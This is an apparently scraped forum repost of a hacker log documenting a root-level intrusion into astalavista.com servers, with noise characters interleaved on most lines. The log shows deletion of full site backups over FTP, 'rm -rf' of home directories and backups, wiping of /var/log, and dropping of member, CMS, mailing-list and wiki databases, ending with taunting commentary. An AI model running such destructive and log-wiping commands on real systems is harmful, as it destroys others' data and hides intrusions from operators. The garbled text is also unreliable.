/ H# R# n; Y- Y7 T3 f( tftp> ls -la6 j" d; l6 `6 }# E: y% S
227 Entering Passive Mode (212,254,194,163,2,189)
1 b( l3 k, I4 ?, l2 V3 L$ M( n150 Opening BINARY mode data connection for ‘file list’.
9 n. j9 N" V& O6 b3 G' F* s" L; b-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
- K- U3 }' W4 Q1 u) {5 ~" x-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2( Q! x- c5 D( [4 T1 w' H
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
9 ^2 D% l. Z& ~$ w* t-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
! G' [+ i. T% j" q" F-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar# ?% {" P7 z+ c. A( |& x& c
[snip]% H/ Y- v7 p' r {; C5 G$ i1 g
226 Transfer complete.
' l5 T2 i% n, u5 j4 sftp> mdelete *6 t @- y, p0 a$ Q; Y! F- ]$ Q" m
ftp> ls -la! S% N; y! [5 z
227 Entering Passive Mode (212,254,194,163,2,193)
2 y* i m: y* E9 k% j0 ?% X150 Opening BINARY mode data connection for ‘file list’.
- I9 ?" p- z0 C5 @226 Transfer complete." D; o0 e8 f g6 I1 w9 x5 T$ ^
ftp>0 M- m& W# ?/ ?4 C1 S% c. E
2 { `4 O6 {! K% s1 m7 S9 rsh-3.2# cd /home
; S+ a0 q y% j5 {sh-3.2# ls -la9 C/ U5 Z1 d% [/ P5 y$ }! h
total 1202 @' U; ]" t; x$ E9 d" p
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .8 n* R. I" v4 o# V' ^+ c
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 g4 M# ^, `' U! n0 m+ K) n+ a
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
?' E$ U! l9 T' F9 r3 Z/ S-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
' `- G G0 T& @0 L* z+ | e-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
4 Y4 \! P; Q n/ Y) q% }drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
7 a' B$ V) Y( [" V, t2 @drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
9 Z2 L3 L2 k* ^; j2 C* odrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
) T* ?4 ^1 B2 n- C, B' ]- v r1 sdrwx–x–x 10 com com 4096 Apr 28 12:40 com
8 \- v) ^2 U" K/ G idrwxr-xr-x 2 root root 4096 May 17 2007 ftp
: a, t0 I! S, m) fdrwx—— 3 jon jon 4096 Sep 21 2007 jon% s E; _- I8 M. S
drwx—— 2 root root 16384 Sep 11 2007 lost+found
7 K* d4 o* ~- Z6 sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my$ z |! V1 a' G" Q) `" S/ o/ e5 D3 ~
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata/ z8 z& X0 j& Z/ e
drwx—— 2 jon jon 4096 Sep 15 2007 test: l4 A; ^) E) n. G4 Y
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
! S4 o3 N6 c9 l' m! E
, b' j9 h/ P) M5 h% Csh-3.2# rm -rf backup/* J* s6 I, k$ f8 ?
sh-3.2# rm -rf backup.14161/; ?: k. Z4 D" M: [' J
sh-3.2# rm -rf ftp/: g- m- U" W# u& S1 I& J
sh-3.2# rm -rf jon/) Z+ K& Y/ U: z- ~
sh-3.2# rm -rf my/
5 T- ]( [. y4 T' g6 W+ G# `6 e* zsh-3.2# rm -rf mysqldata/" V: X+ F7 R+ |* B( d2 k
sh-3.2# rm -rf test/
: z6 Z2 [, y8 u- I E, F" osh-3.2# rm -rf tmp/6 S, I; R5 O1 E# S9 L. s4 h: y% J
sh-3.2# cd ~
# W# S, u3 _5 y. p$ `& m5 d5 _' nsh-3.2# rm -rf *
4 e% x: ?% @' k3 y9 ?sh-3.2# rm -rf /var/log/
. d4 G8 e* U% ?1 ^+ a5 L" Grm: cannot remove directory `/var/log//proftpd’: Directory not empty: j; `$ f* i, N0 T' ?, g4 y
sh-3.2# rm -rf /home/* r" N: B# v8 q, N
sh-3.2# mysql
0 g( t' r" a; U! _ j9 rWelcome to the MySQL monitor. Commands end with ; or \g.
, c: i3 W g# j" _Your MySQL connection id is 407156
g0 k* t, l* uServer version: 5.0.45-community-log MySQL Community Edition (GPL)
- Y: h2 \8 D- \# U7 }. H, l3 z. S r5 V/ U. a
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer., c8 R5 r, h+ o5 x: }$ ^ k/ M' E
3 Z5 \* H/ \6 ^
mysql> show databases;
$ N& k/ ?1 x4 O. M+———————–+7 m1 C/ R& \3 f; ^0 G" b$ K
| Database |+ k! d5 V K$ z+ b
+———————–+
5 A, c) Y9 ^; k. _7 M0 O: t| information_schema |
$ u; D) B* X2 u& n; Y% ?| astanet_ads |* q% s- {5 l- L0 D8 S+ W
| astanet_mailing_lists |, s; e, F" b0 c _: \+ {
| astanet_mediawiki |
3 x3 x# D7 n7 [& J' u| astanet_membersystem |
' j& w1 R Y% G' U- f9 F. U# L| com_contrexx |
! H( Z) W, o k! n5 V| com_contrexx2 |- W. M* f, ?8 [: _; M* T
| com_contrexx2_live |3 d: r9 J. e9 p( \' u
| da_roundcube |" d0 P* p5 D6 ]- N6 X$ t; {# F
| dolphin |
3 Y* n c$ t6 A. \( M4 ^. C| ideapool |' f, P/ ^# _4 X6 L
| mysql |
) `4 J1 d9 a$ }/ || test |
/ \7 N" a& e# | e| yourmaster |
% m. ]! I+ V( `3 J( k1 l O8 \+———————–+
& {( D( ]+ k& {# |0 v14 rows in set (0.03 sec)1 p- S; R; D8 y4 R1 y- ?
; ?4 M0 \1 k V% e6 X0 O% H) r7 G- gmysql> drop database astanet_membersystem;
* g+ b$ c& Y( x& k8 \! e8 S* r6 wdroQuery OK, 46 rows affected (0.81 sec)& y' A$ N/ c4 d6 @# Z
1 B$ n; a/ {; L9 V* J
mysql> drop database com_contrexx;: {4 |0 R3 c5 t- s6 }* x9 A" _
Query OK, 211 rows affected (2.72 sec)
9 C; y* ^9 X# I* v* j* O7 h( ~% e$ e% B! n ?6 D' O+ b+ P
mysql> drop database com_contrexx2; d' h/ U7 u+ U- g `4 a; a
Query OK, 237 rows affected (2.23 sec)5 n# A# M9 ]/ t' b
2 h! v' |" o: P: G9 u1 J
mysql> drop database com_contrexx2_live;
% V+ K0 m. Y: r. H MQuery OK, 227 rows affected (7.63 sec)
; n1 |; O7 P0 r' {4 n, J& s$ o/ d4 @0 o$ J, A" U, h
mysql> drop database ideapool;. k3 }( U$ @6 N" b3 u$ d$ t
Query OK, 69 rows affected (0.19 sec)
0 Y: s( k6 j. R2 X _' H
! y- {+ w) Q6 q" Lmysql> drop database yourmaster;
" j7 E& R _, ?( u# v& s7 Q: y/ Q- vQuery OK, 158 rows affected (0.55 sec)4 J1 F! y" c7 q9 F: h
" e! g/ u7 A: g8 p( @, s qmysql> drop database astanet_ads;
+ S s4 N+ w A* L* A' yQuery OK, 9 rows affected (0.11 sec)
# A" G& e. t" E3 m# t- B) O% o! h: u& H8 \3 l! H
mysql> drop database astanet_mailing_lists;' l6 D, X4 S N' t3 u) M; W
Query OK, 24 rows affected (1.47 sec)8 X4 F4 W/ b6 P+ M+ |% o
P9 z7 Q2 J" W; B' a
mysql> drop database astanet_mediawiki;3 Z- y$ w- B$ k2 z l1 r G6 _$ X8 F
Query OK, 31 rows affected (0.51 sec)& i: ^" c' A4 o+ w9 n9 v$ }$ }
V/ s: t) W: y9 [+ s. j
mysql> show databases;
: u) b4 a* d: R1 |' u+——————–+
5 Z+ a. V, b7 ?4 O \% t/ e7 V| Database |
! e" L% I, o2 i# Y6 f+——————–+
2 R& o) c9 _! j. p| information_schema |
6 p$ h* _+ q# X* l: _4 ]! T| da_roundcube |& `9 h/ V. t4 L7 _6 l& U
| dolphin |
5 G5 Q! Z I9 r s0 u% C| mysql |: j2 l4 Q" ~: Q F Q% X1 S. n
| test |
5 g3 K9 ]) T; Y# o, G+——————–+" ?8 @+ j7 y, v' B
5 rows in set (0.00 sec)0 w% c U3 }& Z0 }; H# U
3 i$ Y4 c( k- B7 y9 z* h* p
What a journey! We’re not sure exactly why the “Terminator” had any influence on
. P' ]5 s* N* F @# T3 p" Vtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
0 L$ w" m. d) v# B. K+ `6 }wrong to say this pack of morons *wont be back*.
5 p k9 d) W( q* p |
发表于 2012-11-6 21:07:34
收藏
支持
反对